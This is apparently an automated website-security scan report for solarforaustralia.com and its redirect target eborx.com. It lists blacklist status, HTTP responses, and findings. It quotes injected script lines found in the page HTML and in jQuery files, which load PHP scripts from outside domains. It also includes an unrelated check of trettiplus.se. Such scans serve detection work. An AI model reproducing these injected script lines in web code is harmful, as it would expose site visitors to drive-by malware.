Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=solarforaustralia.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trettiplus.se
Result:
HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Fri, 03 Oct 2014 18:11:25 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Server: Apache
Content-Length: 65
Content-Type: text/html
X-Onecom-Suspended: true
X-Varnish: 1830470545 1830470386
...65 bytes of data.
GET / HTTP/1.1
Host: trettiplus.se
Result:
HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Fri, 03 Oct 2014 18:11:25 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Server: Apache
Content-Length: 65
Content-Type: text/html
X-Onecom-Suspended: true
X-Varnish: 1830470545 1830470386
...65 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trettiplus.se
Referer: http://www.google.com/search?q=trettiplus.se
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trettiplus.se
Referer: http://www.google.com/search?q=trettiplus.se
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://solarforaustralia.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 03 Jul 2014 14:16:13 GMT Location: http://www.eborx.com/ Server: Apache Vary: Accept-Encoding Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: startBAK=R3415742665; path=/; expires=Thu, 03-Jul-2014 15:20:44 GMT Set-Cookie: start=R1548263536; path=/; expires=Thu, 03-Jul-2014 15:32:54 GMT | malicious |
http://www.eborx.com/ | 200 OK Content-Length: 16615 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.sabrinaneublum.com.br ...[5016 bytes skipped]... ="#">DE</a> <a href="#" class="active">PL</a> <a href="#">CZ</a> <a href="#">SK</a> </div> <div class="menu"> <div class="menu_top_item" style="margin-left:55px;"> <a href="index.php?p=1">Firma<script type="text/javascript" src="http://www.sabrinaneublum.com.br/cgi-local/qbw2rktb.php?id=124878036"></script></a> <div class="sub"> <ul><li><a href = "index.php?p=1&s=1">Specjalizacja</a></li><li><a href = "index.php?p=1&s=2">Polityka JakoÅci</a></li><li><a href = "index.php?p=1&s=3">Certyfikaty</a></li><li><a href = "index.php?p=1&s=4">Managm ...[15197 bytes skipped]... | ||
http://www.eborx.com/scripts/jquery-1.4.2.min.js | 200 OK Content-Length: 72322 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://zuberskynahon.cz/images/n6ftkxyw.php?id=124878052"></script>'); | ||
http://solarforaustralia.com/scripts/jquery.nivo.slider.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 03 Jul 2014 14:16:14 GMT Location: http://www.eborx.com/scripts/jquery.nivo.slider.js Server: Apache Vary: Accept-Encoding Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: startBAK=R3415747021; path=/; expires=Thu, 03-Jul-2014 15:20:32 GMT Set-Cookie: start=R1548263536; path=/; expires=Thu, 03-Jul-2014 15:18:07 GMT | malicious |
http://www.eborx.com/scripts/jquery.nivo.slider.js | 200 OK Content-Length: 15263 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://zuberskynahon.cz/images/n6ftkxyw.php?id=124878054"></script>'); | ||
http://www.sabrinaneublum.com.br/cgi-local/qbw2rktb.php?id=124878036 | 404 Not Found Content-Length: 1048 Content-Type: text/html | clean |
http://www.sabrinaneublum.com.br/ | 200 OK Content-Length: 4239 Content-Type: text/html | clean |
http://www.sabrinaneublum.com.br/AC_RunActiveContent.js | 200 OK Content-Length: 8028 Content-Type: application/x-javascript | clean |
http://www.sabrinaneublum.com.br/test404page.js | 404 Not Found Content-Length: 1048 Content-Type: text/html | clean |